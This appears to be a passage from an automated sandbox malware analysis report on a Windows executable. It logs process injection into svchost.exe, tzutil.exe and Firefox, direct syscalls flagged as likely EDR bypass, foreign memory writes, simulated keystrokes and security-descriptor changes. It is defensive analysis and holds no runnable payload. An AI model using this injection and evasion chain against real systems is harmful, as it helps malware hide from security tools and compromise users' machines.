Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]	1_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]	1_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]	1_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029730 mov eax, dword ptr fs:[00000030h]	1_2_03029730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029730 mov eax, dword ptr fs:[00000030h]	1_2_03029730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03065734 mov eax, dword ptr fs:[00000030h]	1_2_03065734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303973A mov eax, dword ptr fs:[00000030h]	1_2_0303973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303973A mov eax, dword ptr fs:[00000030h]	1_2_0303973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]	1_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043740 mov eax, dword ptr fs:[00000030h]	1_2_03043740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043740 mov eax, dword ptr fs:[00000030h]	1_2_03043740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043740 mov eax, dword ptr fs:[00000030h]	1_2_03043740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]	1_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]	1_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103749 mov eax, dword ptr fs:[00000030h]	1_2_03103749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]	1_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]	1_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]	1_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]	1_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]	1_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]	1_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF78A mov eax, dword ptr fs:[00000030h]	1_2_030EF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B97A9 mov eax, dword ptr fs:[00000030h]	1_2_030B97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]	1_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]	1_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]	1_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]	1_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]	1_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031037B6 mov eax, dword ptr fs:[00000030h]	1_2_031037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]	1_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D7B0 mov eax, dword ptr fs:[00000030h]	1_2_0305D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]	1_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030357C0 mov eax, dword ptr fs:[00000030h]	1_2_030357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030357C0 mov eax, dword ptr fs:[00000030h]	1_2_030357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030357C0 mov eax, dword ptr fs:[00000030h]	1_2_030357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]	1_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303D7E0 mov ecx, dword ptr fs:[00000030h]	1_2_0303D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03061607 mov eax, dword ptr fs:[00000030h]	1_2_03061607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]	1_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306F603 mov eax, dword ptr fs:[00000030h]	1_2_0306F603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03033616 mov eax, dword ptr fs:[00000030h]	1_2_03033616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03033616 mov eax, dword ptr fs:[00000030h]	1_2_03033616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]	1_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]	1_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]	1_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]	1_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03105636 mov eax, dword ptr fs:[00000030h]	1_2_03105636
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]	1_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]	1_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]	1_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03069660 mov eax, dword ptr fs:[00000030h]	1_2_03069660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03069660 mov eax, dword ptr fs:[00000030h]	1_2_03069660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]	1_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]	1_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]	1_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]	1_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]	1_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D6AA mov eax, dword ptr fs:[00000030h]	1_2_0302D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D6AA mov eax, dword ptr fs:[00000030h]	1_2_0302D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030276B2 mov eax, dword ptr fs:[00000030h]	1_2_030276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030276B2 mov eax, dword ptr fs:[00000030h]	1_2_030276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030276B2 mov eax, dword ptr fs:[00000030h]	1_2_030276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]	1_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0306A6C7

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007C80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_007C80A9

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0079A155
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079A124 SetUnhandledExceptionFilter,		0_2_0079A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\tzutil.exe

Thread register set: target process: 5948

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2417008

Jump to behavior

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007C87B1 LogonUserW,

0_2_007C87B1

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_00773B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00773B3A

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007748D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_007748D7

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007D4C7F mouse_event,

0_2_007D4C7F

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gKvjKMCUfq.exe"	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007C7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_007C7CAF

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007C874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_007C874B

Source: gKvjKMCUfq.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: gKvjKMCUfq.exe, SUMCVKBWRXks.exe, 00000005.00000000.2132255950.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000002.3553338472.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: SUMCVKBWRXks.exe, 00000005.00000000.2132255950.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000002.3553338472.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: SUMCVKBWRXks.exe, 00000005.00000000.2132255950.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000002.3553338472.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
